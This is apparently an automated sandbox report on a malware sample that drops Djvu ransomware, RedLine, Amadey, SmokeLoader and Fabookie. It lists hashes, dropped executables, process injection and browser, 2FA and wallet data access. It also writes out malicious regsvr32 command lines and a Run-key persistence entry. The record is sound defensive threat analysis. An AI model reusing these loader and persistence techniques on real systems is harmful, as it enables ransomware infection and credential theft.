memory/812-469-0x000000001B150000-0x000000001B432000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IETIC4C9Y1V4RBDAF1CE.temp

MD5 f0a96ba9844b1d13eb23b639b9f7f7ef
SHA1 227d4b2f36a85106863edfbaa5abf3ecbe373acf
SHA256 07348b43dfa7e242bac92046655e4f8fd42f9e41ca58de831ad57fa9010ab0a5
SHA512 2a896e4fbaf528610244c49068f3a9259fe4de167aa6c60da3a76d59b499eaf91e02808fc056adf0b9c51ca32b118bbb6d21154d1d672415ca6c70150c083615

memory/812-470-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

memory/580-471-0x0000000002170000-0x00000000021A4000-memory.dmp

memory/812-487-0x000007FEF4570000-0x000007FEF4F0D000-memory.dmp

memory/812-488-0x00000000026B4000-0x00000000026B7000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\26604c4d-b388-4e13-85f1-6795a5ffac8d\build2.exe

MD5 304dcbfad357a684b36d2d639cdbc3eb
SHA1 428c58d8c86c49e28bc9958608817bf6a97dd780
SHA256 bd5aff6936d77e3deae4e45195b44ec5d4e7ba4f2a9dfe68ee7d6f7be2cfd97a
SHA512 8dd618a8a22c3e7f0f19287c6ca8135959f34f30a5d2e19f10f71c45a6b7c8c7dc0900b3e23c3ae479455cd1ce94a744c0841c26bde28f28ef8552130d465d43

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\73836916308175099145430277

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-07 11:48

Reported

2023-08-07 11:58

Platform

win10-20230703-en

Max time kernel

600s

Max time network

545s

Command Line

"C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1461.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1C32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6053.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\fjuisiv N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B30D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B8EA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F2A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2767205360-3565838719-3800013281-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\70d15f63-82c7-494f-84ba-94633b2cacef\\56A.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\56A.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3500 set thread context of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 1872 set thread context of 1200 N/A C:\Users\Admin\AppData\Local\Temp\5351.exe C:\Users\Admin\AppData\Local\Temp\5351.exe
PID 1216 set thread context of 1988 N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe C:\Users\Admin\AppData\Local\Temp\66BD.exe
PID 528 set thread context of 4080 N/A C:\Users\Admin\AppData\Local\Temp\741C.exe C:\Users\Admin\AppData\Local\Temp\741C.exe
PID 4252 set thread context of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe C:\Users\Admin\AppData\Local\Temp\7BED.exe
PID 3540 set thread context of 5100 N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe C:\Users\Admin\AppData\Local\Temp\A6B8.exe
PID 1856 set thread context of 1884 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 4528 set thread context of 1060 N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe C:\Users\Admin\AppData\Local\Temp\DD5B.exe
PID 3160 set thread context of 2824 N/A C:\Users\Admin\AppData\Local\Temp\5351.exe C:\Users\Admin\AppData\Local\Temp\5351.exe
PID 4548 set thread context of 4196 N/A C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe C:\Users\Admin\AppData\Local\c8f4e7d7-89d1-406a-b5a1-5a30aec14f24\build2.exe
PID 728 set thread context of 3584 N/A C:\Users\Admin\AppData\Local\Temp\66BD.exe C:\Users\Admin\AppData\Local\Temp\66BD.exe
PID 712 set thread context of 900 N/A C:\Users\Admin\AppData\Local\Temp\7BED.exe C:\Users\Admin\AppData\Local\Temp\7BED.exe
PID 2644 set thread context of 2564 N/A C:\Users\Admin\AppData\Local\Temp\741C.exe C:\Users\Admin\AppData\Local\Temp\741C.exe
PID 3124 set thread context of 1640 N/A C:\Users\Admin\AppData\Local\Temp\A6B8.exe C:\Users\Admin\AppData\Local\Temp\A6B8.exe
PID 1348 set thread context of 4672 N/A C:\Users\Admin\AppData\Local\Temp\DD5B.exe C:\Users\Admin\AppData\Local\Temp\DD5B.exe
PID 1396 set thread context of 344 N/A C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe
PID 1332 set thread context of 544 N/A C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe C:\Users\Admin\AppData\Local\e0d112a2-612a-4039-886c-286ed420b233\build2.exe
PID 1216 set thread context of 4520 N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 4692 set thread context of 4288 N/A C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe C:\Users\Admin\AppData\Local\f3aadb1a-c003-4341-8a50-f0cadcf9adae\build2.exe
PID 2972 set thread context of 3168 N/A C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe C:\Users\Admin\AppData\Local\b18c185d-55c5-4d93-a92b-45e80665de79\build2.exe
PID 2196 set thread context of 3576 N/A C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe C:\Users\Admin\AppData\Local\8f38a24d-0f8f-45db-a3f6-225118bfeef1\build2.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6053.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3344 wrote to memory of 3500 N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3344 wrote to memory of 3500 N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3344 wrote to memory of 3500 N/A N/A C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3344 wrote to memory of 948 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3344 wrote to memory of 948 N/A N/A C:\Windows\system32\regsvr32.exe
PID 948 wrote to memory of 3808 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 948 wrote to memory of 3808 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 948 wrote to memory of 3808 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3344 wrote to memory of 1280 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3344 wrote to memory of 1280 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1280 wrote to memory of 3916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1280 wrote to memory of 3916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1280 wrote to memory of 3916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3344 wrote to memory of 1336 N/A N/A C:\Users\Admin\AppData\Local\Temp\1461.exe
PID 3344 wrote to memory of 1336 N/A N/A C:\Users\Admin\AppData\Local\Temp\1461.exe
PID 3344 wrote to memory of 1336 N/A N/A C:\Users\Admin\AppData\Local\Temp\1461.exe
PID 3344 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\1C32.exe
PID 3344 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\1C32.exe
PID 3344 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\1C32.exe
PID 3344 wrote to memory of 3836 N/A N/A C:\Users\Admin\AppData\Local\Temp\2318.exe
PID 3344 wrote to memory of 3836 N/A N/A C:\Users\Admin\AppData\Local\Temp\2318.exe
PID 3344 wrote to memory of 3836 N/A N/A C:\Users\Admin\AppData\Local\Temp\2318.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3500 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Users\Admin\AppData\Local\Temp\56A.exe
PID 3344 wrote to memory of 1872 N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe
PID 3344 wrote to memory of 1872 N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe
PID 3344 wrote to memory of 1872 N/A N/A C:\Users\Admin\AppData\Local\Temp\5351.exe
PID 3344 wrote to memory of 1876 N/A N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe
PID 3344 wrote to memory of 1876 N/A N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe
PID 3344 wrote to memory of 1876 N/A N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe
PID 3344 wrote to memory of 2624 N/A N/A C:\Users\Admin\AppData\Local\Temp\6053.exe
PID 3344 wrote to memory of 2624 N/A N/A C:\Users\Admin\AppData\Local\Temp\6053.exe
PID 3344 wrote to memory of 2624 N/A N/A C:\Users\Admin\AppData\Local\Temp\6053.exe
PID 1876 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1876 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1876 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 1876 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 1876 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\5D07.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 3344 wrote to memory of 1216 N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 3344 wrote to memory of 1216 N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 3344 wrote to memory of 1216 N/A N/A C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 3212 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 3212 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 3212 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 832 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 832 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 832 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Users\Admin\AppData\Local\b9864b40-7bb6-493d-bfb1-d5fd4429087e\build2.exe
PID 832 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Windows\SysWOW64\icacls.exe
PID 2532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Windows\SysWOW64\icacls.exe
PID 2532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\56A.exe C:\Windows\SysWOW64\icacls.exe
PID 3344 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe
PID 3344 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe
PID 3344 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\741C.exe

Processes

C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe

"C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe"

C:\Users\Admin\AppData\Local\Temp\56A.exe

C:\Users\Admin\AppData\Local\Temp\56A.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\849.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\849.dll

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\A6D.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\A6D.dll

C:\Users\Admin\AppData\Local\Temp\1461.exe

C:\Users\Admin\AppData\Local\Temp\1461.exe

C:\Users\Admin\AppData\Local\Temp\1C32.exe

C:\Users\Admin\AppData\Local\Temp\1C32.exe

C:\Users\Admin\AppData\Local\Temp\2318.exe

C:\Users\Admin\AppData\Local\Temp\2318.exe

C:\Users\Admin\AppData\Local\Temp\56A.exe

C:\Users\Admin\AppData\Local\Temp\56A.exe

C:\Users\Admin\AppData\Local\Temp\5351.exe

C:\Users\Admin\AppData\Local\Temp\5351.exe

C:\Users\Admin\AppData\Local\Temp\5D07.exe

C:\Users\Admin\AppData\Local\Temp\5D07.exe

C:\Users\Admin\AppData\Local\Temp\6053.exe

C:\Users\Admin\AppData\Local\Temp\6053.exe

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

"C:\Users\Admin\AppData\Local\Temp\latestplayer.exe"

C:\Users\Admin\AppData\Local\Temp\66BD.exe

C:\Users\Admin\AppData\Local\Temp\66BD.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

